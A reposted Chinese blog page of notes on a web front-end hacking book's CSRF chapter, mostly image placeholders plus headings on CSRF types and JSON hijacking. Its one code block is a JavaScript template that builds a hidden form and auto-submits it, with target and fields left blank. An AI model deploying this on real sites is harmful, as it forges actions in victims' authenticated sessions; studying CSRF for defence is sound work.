码迷,mamicode.com
首页 > Web开发 > 详细

web前端黑客技术揭秘 4.前端黑客之CSRF

时间:2017-08-18 18:26:15      阅读:215      评论:0      收藏:0      [点我收藏+]

标签:黑客   技术   inpu   img   orm   eva   类型   display   csrf   

 技术分享

 

技术分享

技术分享

技术分享

技术分享

技术分享

技术分享

技术分享

技术分享

技术分享

 1     function new_form() {//创建表单
 2             var f = document.createElement("form");
 3             document.body.appendChild(f);
 4             f.method = "post";
 5             return f;
 6         }
 7         function create_elements(eForm, eName, eValue) {
 8             //创建表单项函数,eForm:表单对象,eName:表单项,eValue:表单值
 9             var e = document.createElement("input");
10             eForm.appendChild(e);
11             e.type = "text";
12             e.name = eName;
13             if (!document.all) {
14                 e.style.display = "none";
15             } else {
16                 e.style.display = "block";
17                 e.style.width = "0px"
18                 e.style.height = "0px"
19             }//兼容浏览器的隐藏设置,目的是让表单不可见
20             e.value = eValue;
21             return e;
22         }
23         var _f = new_form();
24         create_elements(_f, "", "");
25         _f.action = "";
26         _f.submit();//自动提交

 技术分享

4.2  CSRF类型

 技术分享

技术分享

技术分享

4.2.2  JSON HiJacking攻击

 技术分享

技术分享

 

web前端黑客技术揭秘 4.前端黑客之CSRF

标签:黑客   技术   inpu   img   orm   eva   类型   display   csrf   

原文地址:http://www.cnblogs.com/wingzw/p/7390814.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!